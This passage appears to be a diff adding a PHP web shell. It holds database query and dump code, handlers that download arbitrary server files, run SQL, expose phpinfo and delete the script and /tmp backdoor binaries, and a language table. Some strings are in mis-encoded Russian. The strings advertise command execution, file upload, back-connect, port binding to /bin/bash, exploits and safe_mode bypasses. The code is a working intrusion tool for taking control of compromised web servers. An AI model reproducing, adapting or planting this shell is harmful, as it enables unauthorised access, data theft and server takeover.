return 1; } + return 2; + break; + case 'PostgreSQL': + if(false===($this->res=@pg_query($this->connection,$query))) + { + $this->error = @pg_last_error($this->connection); + return 0; + } + else if(@pg_num_rows($this->res) > 0) { return 1; } + return 2; + break; + case 'Oracle': + if(false===($this->res=@ociparse($this->connection,$query))) + { + $this->error = 'Query parse error'; + } + else + { + if(@ociexecute($this->res)) + { + if(@ocirowcount($this->res) != 0) return 2; + return 1; + } + $error = @ocierror(); + $this->error=$error['message']; + } + break; + } + return 0; + } + function get_result() + { + $this->rows=array(); + $this->columns=array(); + $this->num_rows=$this->num_fields=0; + switch($this->db) + { + case 'MySQL': + $this->num_rows=@mysql_num_rows($this->res); + $this->num_fields=@mysql_num_fields($this->res); + while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); + @mysql_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'MSSQL': + $this->num_rows=@mssql_num_rows($this->res); + $this->num_fields=@mssql_num_fields($this->res); + while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); + @mssql_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}; + break; + case 'PostgreSQL': + $this->num_rows=@pg_num_rows($this->res); + $this->num_fields=@pg_num_fields($this->res); + while(false !== ($this->rows[] = @pg_fetch_assoc($this->res))); + @pg_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'Oracle': + $this->num_fields=@ocinumcols($this->res); + while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; + @ocifreestatement($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + } + return 0; + } + function dump($table) + { + if(empty($table)) return 0; + $this->dump=array(); + $this->dump[0] = '##'; + $this->dump[1] = '## --------------------------------------- '; + $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s"); + $this->dump[3] = '## Database: '.$this->base; + $this->dump[4] = '## Table: '.$table; + $this->dump[5] = '## --------------------------------------- '; + switch($this->db) + { + case 'MySQL': + $this->dump[0] = '## MySQL dump'; + if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0; + if(!$this->get_result()) return 0; + $this->dump[] = $this->rows[0]['Create Table']; + $this->dump[] = '## --------------------------------------- '; + if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);} + $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'MSSQL': + $this->dump[0] = '## MSSQL dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'PostgreSQL': + $this->dump[0] = '## PostgreSQL dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'Oracle': + $this->dump[0] = '## ORACLE dump'; + $this->dump[] = '## under construction'; + break; + default: + return 0; + break; + } + return 1; + } + function close() + { + switch($this->db) + { + case 'MySQL': + @mysql_close($this->connection); + break; + case 'MSSQL': + @mssql_close($this->connection); + break; + case 'PostgreSQL': + @pg_close($this->connection); + break; + case 'Oracle': + @oci_close($this->connection); + break; + } + } + function affected_rows() + { + switch($this->db) + { + case 'MySQL': + return @mysql_affected_rows($this->res); + break; + case 'MSSQL': + return @mssql_affected_rows($this->res); + break; + case 'PostgreSQL': + return @pg_affected_rows($this->res); + break; + case 'Oracle': + return @ocirowcount($this->res); + break; + default: + return 0; + break; + } + } + } +if(isset($_GET['img'])&&!empty($_GET['img'])) + { + $images = array(); + $images[1]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI9pkODnYohUhQIAOw=='; + $images[2]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI+pwA3hnmlJhgIAOw=='; + @ob_clean(); + header("Content-type: image/gif"); + echo base64_decode($images[$_GET['img']]); + die(); + } +if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name'])) + { + if(!$file=@fopen($_POST['d_name'],"r")) { echo re($_POST['d_name']); $_POST['cmd']=""; } + else + { + @ob_clean(); + $filename = @basename($_POST['d_name']); + $filedump = @fread($file,@filesize($_POST['d_name'])); + fclose($file); + $content_encoding=$mime_type=''; + compress($filename,$filedump,$_POST['compress']); + if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); } + header("Content-type: ".$mime_type); + header("Content-disposition: attachment; filename=\"".$filename."\";"); + echo $filedump; + exit(); + } + } +if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); } +if ($_POST['cmd']=="db_query") + { + echo $head; + $sql = new my_sql(); + $sql->db = $_POST['db']; + $sql->host = $_POST['db_server']; + $sql->port = $_POST['db_port']; + $sql->user = $_POST['mysql_l']; + $sql->pass = $_POST['mysql_p']; + $sql->base = $_POST['mysql_db']; + $querys = @explode(';',$_POST['db_query']); + + if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>"; + else + { + if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>"; + else + { + foreach($querys as $num=>$query) + { + if(strlen($query)>5) + { + echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>"; + switch($sql->query($query)) + { + case '0': + echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>"; + break; + case '1': + if($sql->get_result()) + { + echo "<table width=100%>"; + foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); + $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;", $sql->columns); + echo "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; + for($i=0;$i<$sql->num_rows;$i++) + { + foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); + $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]); + echo '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>'; + } + echo "</table>"; + } + break; + case '2': + $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); + echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>"; + break; + } + } + } + } + } + echo "<br><form name=form method=POST>"; + echo in('hidden','db',0,$_POST['db']); + echo in('hidden','db_server',0,$_POST['db_server']); + echo in('hidden','db_port',0,$_POST['db_port']); + echo in('hidden','mysql_l',0,$_POST['mysql_l']); + echo in('hidden','mysql_p',0,$_POST['mysql_p']); + echo in('hidden','mysql_db',0,$_POST['mysql_db']); + echo in('hidden','cmd',0,'db_query'); + echo "<div align=center><textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; + echo "</form>"; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); + } +if(isset($_GET['delete'])) + { + @unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1)); + } +if(isset($_GET['tmp'])) + { + @unlink("/tmp/bdpl"); + @unlink("/tmp/back"); + @unlink("/tmp/bd"); + @unlink("/tmp/bd.c"); + @unlink("/tmp/dp"); + @unlink("/tmp/dpc"); + @unlink("/tmp/dpc.c"); + } +if(isset($_GET['phpini'])) +{ +echo $head; +function U_value($value) + { + if ($value == '') return '<i>no value</i>'; + if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; + if ($value === null) return 'NULL'; + if (@is_object($value)) $value = (array) $value; + if (@is_array($value)) + { + @ob_start(); + print_r($value); + $value = @ob_get_contents(); + @ob_end_clean(); + } + return U_wordwrap((string) $value); + } +function U_wordwrap($str) + { + $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true); + return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str); + } +if (@function_exists('ini_get_all')) + { + $r = ''; + echo '<table width=100%>', '<tr><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#cccccc><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>'; + foreach (@ini_get_all() as $key=>$value) + { + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>'; + } + echo $r; + echo '</table>'; + } +echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; +die(); +} +if(isset($_GET['cpu'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>'; + $cpuf = @file("cpuinfo"); + if($cpuf) + { + $c = @sizeof($cpuf); + for($i=0;$i<$c;$i++) + { + $info = @explode(":",$cpuf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +if(isset($_GET['mem'])) + { + echo $head; + echo '<table width=100%><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>'; + $memf = @file("meminfo"); + if($memf) + { + $c = sizeof($memf); + for($i=0;$i<$c;$i++) + { + $info = explode(":",$memf[$i]); + if($info[1]==""){ $info[1]="---"; } + $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>'; + } + echo $r; + } + else + { + echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>'; + } + echo '</table>'; + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +$lang=array( +'ru_text1' =>'أ‚أ»أ¯أ®أ«أ­أ¥أ­أ­أ أ؟ أھأ®أ¬أ أ­أ¤أ ', +'ru_text2' =>'أ‚أ»أ¯أ®أ«أ­أ¥أ­أ¨أ¥ أھأ®أ¬أ أ­أ¤ أ­أ  أ±أ¥أ°أ¢أ¥أ°أ¥', +'ru_text3' =>'أ‚أ»أ¯أ®أ«أ­أ¨أ²أ¼ أھأ®أ¬أ أ­أ¤أ³', +'ru_text4' =>'أگأ أ،أ®أ·أ أ؟ أ¤أ¨أ°أ¥أھأ²أ®أ°أ¨أ؟', +'ru_text5' =>'أ‡أ أ£أ°أ³أ§أھأ  أ´أ أ©أ«أ®أ¢ أ­أ  أ±أ¥أ°أ¢أ¥أ°', +'ru_text6' =>'أ‹أ®أھأ أ«أ¼أ­أ»أ© أ´أ أ©أ«', +'ru_text7' =>'أ€أ«أ¨أ أ±أ»', +'ru_text8' =>'أ‚أ»أ،أ¥أ°أ¨أ²أ¥ أ أ«أ¨أ أ±', +'ru_butt1' =>'أ‚أ»أ¯أ®أ«أ­أ¨أ²أ¼', +'ru_butt2' =>'أ‡أ أ£أ°أ³أ§أ¨أ²أ¼', +'ru_text9' =>'أژأ²أھأ°أ»أ²أ¨أ¥ أ¯أ®أ°أ²أ  أ¨ أ¯أ°أ¨أ¢أ؟أ§أھأ  أ¥أ£أ® أھ /bin/bash', +'ru_text10'=>'أژأ²أھأ°أ»أ²أ¼ أ¯أ®أ°أ²', +'ru_text11'=>'أڈأ أ°أ®أ«أ¼ أ¤أ«أ؟ أ¤أ®أ±أ²أ³أ¯أ ', +'ru_butt3' =>'أژأ²أھأ°أ»أ²أ¼', +'ru_text12'=>'back-connect', +'ru_text13'=>'IP-أ أ¤أ°أ¥أ±', +'ru_text14'=>'أڈأ®أ°أ²', +'ru_butt4' =>'أ‚أ»أ¯أ®أ«أ­أ¨أ²أ¼', +'ru_text15'=>'أ‡أ أ£أ°أ³أ§أھأ  أ´أ أ©أ«أ®أ¢ أ± أ³أ¤أ أ«أ¥أ­أ­أ®أ£أ® أ±أ¥أ°أ¢أ¥أ°أ ', +'ru_text16'=>'أˆأ±أ¯أ®أ«أ¼أ§أ®أ¢أ أ²أ¼', +'ru_text17'=>'أ“أ¤أ أ«أ¥أ­أ­أ»أ© أ´أ أ©أ«', +'ru_text18'=>'أ‹أ®أھأ أ«أ¼أ­أ»أ© أ´أ أ©أ«', +'ru_text19'=>'Exploits', +'ru_text20'=>'أˆأ±أ¯أ®أ«أ¼أ§أ®أ¢أ أ²أ¼', +'ru_text21'=>'أچأ®أ¢أ®أ¥ أ¨أ¬أ؟', +'ru_text22'=>'datapipe', +'ru_text23'=>'أ‹أ®أھأ أ«أ¼أ­أ»أ© أ¯أ®أ°أ²', +'ru_text24'=>'أ“أ¤أ أ«أ¥أ­أ­أ»أ© أµأ®أ±أ²', +'ru_text25'=>'أ“أ¤أ أ«أ¥أ­أ­أ»أ© أ¯أ®أ°أ²', +'ru_text26'=>'أˆأ±أ¯أ®أ«أ¼أ§أ®أ¢أ أ²أ¼', +'ru_butt5' =>'أ‡أ أ¯أ³أ±أ²أ¨أ²أ¼', +'ru_text28'=>'أگأ أ،أ®أ²أ  أ¢ safe_mode', +'ru_text29'=>'أ„أ®أ±أ²أ³أ¯ أ§أ أ¯أ°أ¥أ¹أ¥أ­', +'ru_butt6' =>'أ‘أ¬أ¥أ­أ¨أ²أ¼', +'ru_text30'=>'أڈأ°أ®أ±أ¬أ®أ²أ° أ´أ أ©أ«أ ', +'ru_butt7' =>'أ‚أ»أ¢أ¥أ±أ²أ¨', +'ru_text31'=>'أ”أ أ©أ« أ­أ¥ أ­أ أ©أ¤أ¥أ­', +'ru_text32'=>'أ‚أ»أ¯أ®أ«أ­أ¥أ­أ¨أ¥ PHP أھأ®أ¤أ ', +'ru_text33'=>'أڈأ°أ®أ¢أ¥أ°أھأ  أ¢أ®أ§أ¬أ®أ¦أ­أ®أ±أ²أ¨ أ®أ،أµأ®أ¤أ  أ®أ£أ°أ أ­أ¨أ·أ¥أ­أ¨أ© open_basedir أ·أ¥أ°أ¥أ§ أ´أ³أ­أھأ¶أ¨أ¨ cURL', +'ru_butt8' =>'أڈأ°أ®أ¢أ¥أ°أ¨أ²أ¼', +'ru_text34'=>'أڈأ°أ®أ¢أ¥أ°أھأ  أ¢أ®أ§أ¬أ®أ¦أ­أ®أ±أ²أ¨ أ®أ،أµأ®أ¤أ  أ®أ£أ°أ أ­أ¨أ·أ¥أ­أ¨أ© safe_mode أ·أ¥أ°أ¥أ§ أ´أ³أ­أھأ¶أ¨أ¾ include', +'ru_text35'=>'أڈأ°أ®أ¢أ¥أ°أھأ  أ¢أ®أ§أ¬أ®أ¦أ­أ®أ±أ²أ¨ أ®أ،أµأ®أ¤أ  أ®أ£أ°أ أ­أ¨أ·أ¥أ­أ¨أ© safe_mode أ·أ¥أ°أ¥أ§ أ§أ أ£أ°أ³أ§أھأ³ أ´أ أ©أ«أ  أ¢ mysql', +'ru_text36'=>'أپأ أ§أ  . أ’أ أ،أ«أ¨أ¶أ ', +'ru_text37'=>'أ‹أ®أ£أ¨أ­', +'ru_text38'=>'أڈأ أ°أ®أ«أ¼', +'ru_text39'=>'أپأ أ§أ ', +'ru_text40'=>'أ„أ أ¬أ¯ أ²أ أ،أ«أ¨أ¶أ» أ،أ أ§أ» أ¤أ أ­أ­أ»أµ', +'ru_butt9' =>'أ„أ أ¬أ¯', +'ru_text41'=>'أ‘أ®أµأ°أ أ­أ¨أ²أ¼ أ¢ أ´أ أ©أ«أ¥', +'ru_text42'=>'أگأ¥أ¤أ أھأ²أ¨أ°أ®أ¢أ أ­أ¨أ¥ أ´أ أ©أ«أ ', +'ru_text43'=>'أگأ¥أ¤أ أھأ²أ¨أ°أ®أ¢أ أ²أ¼ أ´أ أ©أ«', +'ru_butt10'=>'أ‘أ®أµأ°أ أ­أ¨أ²أ¼', +'ru_butt11'=>'أگأ¥أ¤أ أھأ²أ¨أ°أ®أ¢أ أ²أ¼', +'ru_text44'=>'أگأ¥أ¤أ أھأ²أ¨أ°أ®أ¢أ أ­أ¨أ¥ أ´أ أ©أ«أ  أ­أ¥أ¢أ®أ§أ¬أ®أ¦أ­أ®! أ„أ®أ±أ²أ³أ¯ أ²أ®أ«أ¼أھأ® أ¤أ«أ؟ أ·أ²أ¥أ­أ¨أ؟!', +'ru_text45'=>'أ”أ أ©أ« أ±أ®أµأ°أ أ­أ¥أ­', +'ru_text46'=>'أڈأ°أ®أ±أ¬أ®أ²أ° phpinfo()', +'ru_text47'=>'أڈأ°أ®أ±أ¬أ®أ²أ° أ­أ أ±أ²أ°أ®أ¥أھ php.ini', +'ru_text48'=>'أ“أ¤أ أ«أ¥أ­أ¨أ¥ أ¢أ°أ¥أ¬أ¥أ­أ­أ»أµ أ´أ أ©أ«أ®أ¢', +'ru_text49'=>'أ“أ¤أ أ«أ¥أ­أ¨أ¥ أ±أھأ°أ¨أ¯أ²أ  أ± أ±أ¥أ°أ¢أ¥أ°أ ', +'ru_text50'=>'أˆأ­أ´أ®أ°أ¬أ أ¶أ¨أ؟ أ® أ¯أ°أ®أ¶أ¥أ±أ±أ®أ°أ¥', +'ru_text51'=>'أˆأ­أ´أ®أ°أ¬أ أ¶أ¨أ؟ أ® أ¯أ أ¬أ؟أ²أ¨', +'ru_text52'=>'أ’أ¥أھأ±أ² أ¤أ«أ؟ أ¯أ®أ¨أ±أھأ ', +'ru_text53'=>'أˆأ±أھأ أ²أ¼ أ¢ أ¯أ أ¯أھأ¥', +'ru_text54'=>'أڈأ®أ¨أ±أھ أ²أ¥أھأ±أ²أ  أ¢ أ´أ أ©أ«أ أµ', +'ru_butt12'=>'أچأ أ©أ²أ¨', +'ru_text55'=>'أ’أ®أ«أ¼أھأ® أ¢ أ´أ أ©أ«أ أµ', +'ru_text56'=>'أچأ¨أ·أ¥أ£أ® أ­أ¥ أ­أ أ©أ¤أ¥أ­أ®', +'ru_text57'=>'أ‘أ®أ§أ¤أ أ²أ¼/أ“أ¤أ أ«أ¨أ²أ¼ أ”أ أ©أ«/أ„أ¨أ°أ¥أھأ²أ®أ°أ¨أ¾', +'ru_text58'=>'أˆأ¬أ؟', +'ru_text59'=>'أ”أ أ©أ«', +'ru_text60'=>'أ„أ¨أ°أ¥أھأ²أ®أ°أ¨أ¾', +'ru_butt13'=>'أ‘أ®أ§أ¤أ أ²أ¼/أ“أ¤أ أ«أ¨أ²أ¼', +'ru_text61'=>'أ”أ أ©أ« أ±أ®أ§أ¤أ أ­', +'ru_text62'=>'أ„أ¨أ°أ¥أھأ²أ®أ°أ¨أ؟ أ±أ®أ§أ¤أ أ­أ ', +'ru_text63'=>'أ”أ أ©أ« أ³أ¤أ أ«أ¥أ­', +'ru_text64'=>'أ„أ¨أ°أ¥أھأ²أ®أ°أ¨أ؟ أ³أ¤أ أ«أ¥أ­أ ', +'ru_text65'=>'أ‘أ®أ§أ¤أ أ²أ¼', +'ru_text66'=>'أ“أ¤أ أ«أ¨أ²أ¼', +'ru_text67'=>'Chown/Chgrp/Chmod', +'ru_text68'=>'أٹأ®أ¬أ أ­أ¤أ ', +'ru_text69'=>'أڈأ أ°أ أ¬أ¥أ²أ°1', +'ru_text70'=>'أڈأ أ°أ أ¬أ¥أ²أ°2', +'ru_text71'=>"أ‚أ²أ®أ°أ®أ© أ¯أ أ°أ أ¬أ¥أ²أ° أھأ®أ¬أ أ­أ¤أ»:\r\n- أ¤أ«أ؟ CHOWN - أ¨أ¬أ؟ أ­أ®أ¢أ®أ£أ® أ¯أ®أ«أ¼أ§أ®أ¢أ أ²أ¥أ«أ؟ أ¨أ«أ¨ أ¥أ£أ® UID (أ·أ¨أ±أ«أ®أ¬) \r\n- أ¤أ«أ؟ أھأ®أ¬أ أ­أ¤أ» CHGRP - أ¨أ¬أ؟ أ£أ°أ³أ¯أ¯أ» أ¨أ«أ¨ GID (أ·أ¨أ±أ«أ®أ¬) \r\n- أ¤أ«أ؟ أھأ®أ¬أ أ­أ¤أ» CHMOD - أ¶أ¥أ«أ®أ¥ أ·أ¨أ±أ«أ® أ¢ أ¢أ®أ±أ¼أ¬أ¥أ°أ¨أ·أ­أ®أ¬ أ¯أ°أ¥أ¤أ±أ²أ أ¢أ«أ¥أ­أ¨أ¨ (أ­أ أ¯أ°أ¨أ¬أ¥أ° 0777)", +'ru_text72'=>'أ’أ¥أھأ±أ² أ¤أ«أ؟ أ¯أ®أ¨أ±أھأ ', +'ru_text73'=>'أˆأ±أھأ أ²أ¼ أ¢ أ¯أ أ¯أھأ¥', +'ru_text74'=>'أˆأ±أھأ أ²أ¼ أ¢ أ´أ أ©أ«أ أµ', +'ru_text75'=>'* أ¬أ®أ¦أ­أ® أ¨أ±أ¯أ®أ«أ¼أ§أ®أ¢أ أ²أ¼ أ°أ¥أ£أ³أ«أ؟أ°أ­أ®أ¥ أ¢أ»أ°أ أ¦أ¥أ­أ¨أ¥', +'ru_text76'=>'أڈأ®أ¨أ±أھ أ²أ¥أھأ±أ²أ  أ¢ أ´أ أ©أ«أ أµ أ± أ¯أ®أ¬أ®أ¹أ¼أ¾ أ³أ²أ¨أ«أ¨أ²أ» find', +'ru_text80'=>'أ’أ¨أ¯', +'ru_text81'=>'أ‘أ¥أ²أ¼', +'ru_text82'=>'أپأ أ§أ» أ¤أ أ­أ­أ»أµ', +'ru_text83'=>'أ‚أ»أ¯أ®أ«أ­أ¥أ­أ¨أ¥ SQL أ§أ أ¯أ°أ®أ±أ ', +'ru_text84'=>'SQL أ§أ أ¯أ°أ®أ±', +'ru_text85'=>'أڈأ°أ®أ¢أ¥أ°أھأ  أ¢أ®أ§أ¬أ®أ¦أ­أ®أ±أ²أ¨ أ®أ،أµأ®أ¤أ  أ®أ£أ°أ أ­أ¨أ·أ¥أ­أ¨أ© safe_mode أ·أ¥أ°أ¥أ§ أ¢أ»أ¯أ®أ«أ­أ¥أ­أ¨أ¥ أھأ®أ¬أ أ­أ¤ أ¢ MSSQL أ±أ¥أ°أ¢أ¥أ°أ¥', +'ru_text86'=>'أ‘أھأ أ·أ¨أ¢أ أ­أ¨أ¥ أ´أ أ©أ«أ  أ± أ±أ¥أ°أ¢أ¥أ°أ ', +'ru_butt14'=>'أ‘أھأ أ·أ أ²أ¼', +'ru_text87'=>'أ‘أھأ أ·أ¨أ¢أ أ­أ¨أ¥ أ´أ أ©أ«أ®أ¢ أ± أ³أ¤أ أ«أ¥أ­أ­أ®أ£أ® ftp-أ±أ¥أ°أ¢أ¥أ°أ ', +'ru_text88'=>'FTP-أ±أ¥أ°أ¢أ¥أ°:أ¯أ®أ°أ²', +'ru_text89'=>'أ”أ أ©أ« أ­أ  ftp أ±أ¥أ°أ¢أ¥أ°أ¥', +'ru_text90'=>'أگأ¥أ¦أ¨أ¬ أ¯أ¥أ°أ¥أ¤أ أ·أ¨', +'ru_text91'=>'أ€أ°أµأ¨أ¢أ¨أ°أ®أ¢أ أ²أ¼ أ¢', +'ru_text92'=>'أ،أ¥أ§ أ أ°أµأ¨أ¢أ أ¶أ¨أ¨', +'ru_text93'=>'FTP', +'ru_text94'=>'FTP-أ،أ°أ³أ²أ´أ®أ°أ±', +'ru_text95'=>'أ‘أ¯أ¨أ±أ®أھ أ¯أ®أ«أ¼أ§أ®أ¢أ أ²أ¥أ«أ¥أ©', +'ru_text96'=>'أچأ¥ أ³أ¤أ أ«أ®أ±أ¼ أ¯أ®أ«أ³أ·أ¨أ²أ¼ أ±أ¯أ¨أ±أ®أھ أ¯أ®أ«أ¼أ§أ®أ¢أ أ²أ¥أ«أ¥أ©', +'ru_text97'=>'أڈأ°أ®أ¢أ¥أ°أ¥أ­أ® أھأ®أ¬أ،أ¨أ­أ أ¶أ¨أ©: ', +'ru_text98'=>'أ“أ¤أ أ·أ­أ»أµ أ¯أ®أ¤أھأ«أ¾أ·أ¥أ­أ¨أ©: ', +'ru_text99'=>'* أ¢ أھأ أ·أ¥أ±أ²أ¢أ¥ أ«أ®أ£أ¨أ­أ  أ¨ أ¯أ أ°أ®أ«أ؟ أ¨أ±أ¯أ®أ«أ¼أ§أ³أ¥أ²أ±أ؟ أ¨أ¬أ؟ أ¯أ®أ«أ¼أ§أ®أ¢أ أ²أ¥أ«أ؟ أ¨أ§ /etc/passwd', +'ru_text100'=>'أژأ²أ¯أ°أ أ¢أھأ  أ´أ أ©أ«أ®أ¢ أ­أ  أ³أ¤أ أ«أ¥أ­أ­أ»أ© أ´أ²أ¯ أ±أ¥أ°أ¢أ¥أ°', +'ru_text101'=>'أˆأ±أ¯أ®أ«أ¼أ§أ®أ¢أ أ²أ¼ أ²أ أھأ¦أ¥ أ¯أ¥أ°أ¥أ¢أ¥أ°أ­أ³أ²أ®أ¥ (user -> resu) أ¨أ¬أ؟ أ¯أ®أ«أ¼أ§أ®أ¢أ أ²أ¥أ«أ؟ أ¢ أھأ أ·أ¥أ±أ²أ¢أ¥ أ¯أ أ°أ®أ«أ؟', +'ru_text102'=>'أڈأ®أ·أ²أ ', +'ru_text103'=>'أژأ²أ¯أ°أ أ¢أھأ  أ¯أ¨أ±أ¼أ¬أ ', +'ru_text104'=>'أژأ²أ¯أ°أ أ¢أھأ  أ´أ أ©أ«أ  أ­أ  أ¯أ®أ·أ²أ®أ¢أ»أ© أ؟أ¹أ¨أھ', +'ru_text105'=>'أٹأ®أ¬أ³', +'ru_text106'=>'أژأ²', +'ru_text107'=>'أ’أ¥أ¬أ ', +'ru_butt15'=>'أژأ²أ¯أ°أ أ¢أ¨أ²أ¼', +'ru_text108'=>'أ’أ¥أھأ±أ² أ¯أ¨أ±أ¼أ¬أ ', +'ru_text109'=>'أ‘أ¢أ¥أ°أ­أ³أ²أ¼', +'ru_text110'=>'أگأ أ§أ¢أ¥أ°أ­أ³أ²أ¼', +'ru_text111'=>'SQL-أ‘أ¥أ°أ¢أ¥أ° : أ¯أ®أ°أ²', +'ru_text112'=>'أڈأ°أ®أ¢أ¥أ°أھأ  أ¢أ®أ§أ¬أ®أ¦أ­أ®أ±أ²أ¨ أ®أ،أµأ®أ¤أ  أ®أ£أ°أ أ­أ¨أ·أ¥أ­أ¨أ© safe_mode أ·أ¥أ°أ¥أ§ أ¨أ±أ¯أ®أ«أ¼أ§أ®أ¢أ أ­أ¨أ¥ أ´أ³أ­أھأ¶أ¨أ¨ mb_send_mail', +'ru_text113'=>'أڈأ°أ®أ¢أ¥أ°أھأ  أ¢أ®أ§أ¬أ®أ¦أ­أ®أ±أ²أ¨ أ®أ،أµأ®أ¤أ  أ®أ£أ°أ أ­أ¨أ·أ¥أ­أ¨أ© safe_mode, أ¯أ°أ®أ±أ¬أ®أ²أ° أ«أ¨أ±أ²أ¨أ­أ£أ  أ¤أ¨أ°أ¥أھأ²أ®أ°أ¨أ© أ± أ¨أ±أ¯أ®أ«أ¼أ§أ®أ¢أ أ­أ¨أ¥أ¬ imap_list', +'ru_text114'=>'أڈأ°أ®أ¢أ¥أ°أھأ  أ¢أ®أ§أ¬أ®أ¦أ­أ®أ±أ²أ¨ أ®أ،أµأ®أ¤أ  أ®أ£أ°أ أ­أ¨أ·أ¥أ­أ¨أ© safe_mode, أ¯أ°أ®أ±أ¬أ®أ²أ° أ±أ®أ¤أ¥أ°أ¦أ¨أ¬أ®أ£أ® أ´أ أ©أ«أ  أ± أ¨أ±أ¯أ®أ«أ¼أ§أ®أ¢أ أ­أ¨أ¥أ¬ imap_body', +/* --------------------------------------------------------------- */ +'eng_text1' =>'Executed command', +'eng_text2' =>'Execute command on server', +'eng_text3' =>'Run command', +'eng_text4' =>'Work directory', +'eng_text5' =>'Upload files on server', +'eng_text6' =>'Local file', +'eng_text7' =>'Aliases', +'eng_text8' 